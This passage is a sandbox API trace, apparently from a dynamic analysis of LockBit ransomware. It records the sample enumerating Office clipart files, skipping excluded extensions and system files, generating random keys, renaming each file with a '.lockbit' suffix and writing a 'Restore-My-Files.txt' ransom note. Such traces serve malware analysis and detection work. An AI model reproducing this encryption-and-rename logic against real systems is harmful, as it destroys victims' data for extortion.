[0120.766] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.767] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.767] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.767] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.767] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.767] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.767] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.767] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.767] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.lockbit") returned 72 [0120.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0120.768] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.768] malloc (_Size=0x40068) returned 0x3df0008 [0120.768] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3332) returned 1 [0120.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0120.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0120.769] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.774] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.774] malloc (_Size=0xa6) returned 0x77d7a8 [0120.774] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.775] free (_Block=0x77d7a8) [0120.775] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.775] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.775] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.775] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e07f600, ftCreationTime.dwHighDateTime=0x1bd6ced, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3e07f600, ftLastWriteTime.dwHighDateTime=0x1bd6ced, nFileSizeHigh=0x0, nFileSizeLow=0x5b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090779.WMF", cAlternateFileName="")) returned 1 [0120.775] lstrcmpiW (lpString1=".", lpString2="J0090779.WMF") returned -1 [0120.775] lstrcmpiW (lpString1="..", lpString2="J0090779.WMF") returned -1 [0120.775] PathFindExtensionW (pszPath="J0090779.WMF") returned=".WMF" [0120.775] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.775] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.775] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.775] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.775] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.776] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.776] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.777] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090779.WMF") returned 1 [0120.778] lstrcmpiW (lpString1="ntldr", lpString2="J0090779.WMF") returned 1 [0120.778] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090779.WMF") returned 1 [0120.778] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090779.WMF") returned -1 [0120.778] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090779.WMF") returned -1 [0120.778] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090779.WMF") returned 1 [0120.778] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090779.WMF") returned -1 [0120.778] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.778] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned=".WMF" [0120.778] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.778] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.778] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.779] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.779] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.lockbit") returned 72 [0120.780] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0120.780] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.780] malloc (_Size=0x40068) returned 0x3ef0008 [0120.780] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1456) returned 1 [0120.780] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.781] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0120.781] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.782] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0120.782] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0120.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.787] malloc (_Size=0xa6) returned 0x77d7a8 [0120.787] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.788] free (_Block=0x77d7a8) [0120.788] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.788] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.789] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e07f600, ftCreationTime.dwHighDateTime=0x1bd6ced, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3e07f600, ftLastWriteTime.dwHighDateTime=0x1bd6ced, nFileSizeHigh=0x0, nFileSizeLow=0x14c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090781.WMF", cAlternateFileName="")) returned 1 [0120.789] lstrcmpiW (lpString1=".", lpString2="J0090781.WMF") returned -1 [0120.789] lstrcmpiW (lpString1="..", lpString2="J0090781.WMF") returned -1 [0120.789] PathFindExtensionW (pszPath="J0090781.WMF") returned=".WMF" [0120.789] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.789] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.790] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.790] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.791] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090781.WMF") returned 1 [0120.791] lstrcmpiW (lpString1="ntldr", lpString2="J0090781.WMF") returned 1 [0120.791] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090781.WMF") returned 1 [0120.791] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090781.WMF") returned -1 [0120.791] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090781.WMF") returned -1 [0120.791] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090781.WMF") returned 1 [0120.791] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090781.WMF") returned -1 [0120.791] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.791] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned=".WMF" [0120.792] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.792] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.792] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.793] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.793] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.793] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.793] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.793] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.793] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.793] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.793] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.lockbit") returned 72 [0120.793] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0120.794] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.794] malloc (_Size=0x40068) returned 0x1ff1e60 [0120.794] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5314) returned 1 [0120.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0120.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0120.795] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.800] malloc (_Size=0xa6) returned 0x77d7a8 [0120.801] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.801] free (_Block=0x77d7a8) [0120.801] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.802] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.802] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.802] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e07f600, ftCreationTime.dwHighDateTime=0x1bd6ced, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3e07f600, ftLastWriteTime.dwHighDateTime=0x1bd6ced, nFileSizeHigh=0x0, nFileSizeLow=0x1b16, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090783.WMF", cAlternateFileName="")) returned 1 [0120.802] lstrcmpiW (lpString1=".", lpString2="J0090783.WMF") returned -1 [0120.802] lstrcmpiW (lpString1="..", lpString2="J0090783.WMF") returned -1 [0120.802] PathFindExtensionW (pszPath="J0090783.WMF") returned=".WMF" [0120.802] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.802] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".hlp", 